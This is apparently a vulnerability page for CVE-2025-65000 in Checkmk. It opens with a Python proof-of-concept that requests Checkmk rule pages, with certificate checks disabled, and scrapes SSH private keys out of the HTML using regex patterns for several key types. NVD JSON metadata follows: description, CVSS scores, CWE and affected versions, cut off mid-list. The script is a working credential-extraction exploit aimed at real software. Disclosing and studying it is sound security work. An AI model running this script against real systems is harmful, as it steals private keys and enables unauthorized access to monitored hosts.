CVE-2025-65000

#!/usr/bin/env python3 """ CVE-2025-65000 PoC - Checkmk SSH Private Key Information Disclosure This PoC demonstrates how to extract SSH private keys from Checkmk rule pages. """ import requests from bs4 import BeautifulSoup import re import sys import argparse def extract_ssh_keys(html_content): """Extract SSH private keys from HTML source.""" keys = [] # Look for SSH private key patterns in HTML # Private keys typically start with -----BEGIN OPENSSH PRIVATE KEY----- # or -----BEGIN RSA PRIVATE KEY----- patterns = [ r'(-----BEGIN OPENSSH PRIVATE KEY-----.*?-----END OPENSSH PRIVATE KEY-----)', r'(-----BEGIN RSA PRIVATE KEY-----.*?-----END RSA PRIVATE KEY-----)', r'(-----BEGIN DSA PRIVATE KEY-----.*?-----END DSA PRIVATE KEY-----)', r'(-----BEGIN EC PRIVATE KEY-----.*?-----END EC PRIVATE KEY-----)' ] for pattern in patterns: matches = re.findall(pattern, html_content, re.DOTALL) keys.extend(matches) return keys def check_vulnerability(base_url, rule_id=None): """Check if the Checkmk instance is vulnerable.""" print(f"[*] Checking vulnerability at {base_url}") # Try to access rule page if rule_id: url = f"{base_url}/check_mk/automation.py?rule_id={rule_id}" else: # Try common rule page patterns url = f"{base_url}/check_mk/wato.py" try: response = requests.get(url, timeout=30, verify=False) if response.status_code == 200: print(f"[+] Received response (status: {response.status_code})") # Extract SSH keys from HTML keys = extract_ssh_keys(response.text) if keys: print(f"[!] Found {len(keys)} SSH private key(s) in HTML source!") for i, key in enumerate(keys, 1): print(f"\n[Key {i}]:") print(key[:100] + "...") # Show first 100 chars return True else: print("[-] No SSH keys found in response") return False else: print(f"[-] Unexpected status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-65000 PoC") parser.add_argument("-u", "--url", required=True, help="Checkmk base URL") parser.add_argument("-r", "--rule-id", help="Specific rule ID to check") args = parser.parse_args() vulnerable = check_vulnerability(args.url, args.rule_id) if vulnerable: print("\n[+] Target is VULNERABLE to CVE-2025-65000") sys.exit(0) else: print("\n[-] Target may not be vulnerable") sys.exit(1)

{"cve": {"id": "CVE-2025-65000", "sourceIdentifier": "[email protected]", "published": "2025-12-18T14:15:59.947", "lastModified": "2025-12-23T17:04:50.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSH private keys of the \"Remote alert handlers (Linux)\" rule were exposed in the rule page's HTML source in Checkmk <= 2.4.0p18 and all versions of Checkmk 2.3.0. This potentially allowed unauthorized triggering of predefined alert handlers on hosts where the handler was deployed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8447E2D1-A540-4D4D-A89B-71581EB5C47A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b1:*:*:*:*:*:*", "matchCriteriaId": "1A020A77-7D84-4557-9B0B-D74A89BC1538"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b2:*:*:*:*:*:*", "matchCriteriaId": "D9770554-978B-4552-9E0E-CD6B6675243C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b3:*:*:*:*:*:*", "matchCriteriaId": "1883D2F4-CB96-4DDE-87E8-D1990A3FA092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b4:*:*:*:*:*:*", "matchCriteriaId": "99AD6F39-AF67-4CB9-BED2-00CA75B9F5DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b5:*:*:*:*:*:*", "matchCriteriaId": "F08FE580-67D4-419C-AE4A-3B9EBC6A2838"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b6:*:*:*:*:*:*", "matchCriteriaId": "9DD5C67F-CD3E-400E-802D-8B52408A259F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", "matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", ... (truncated)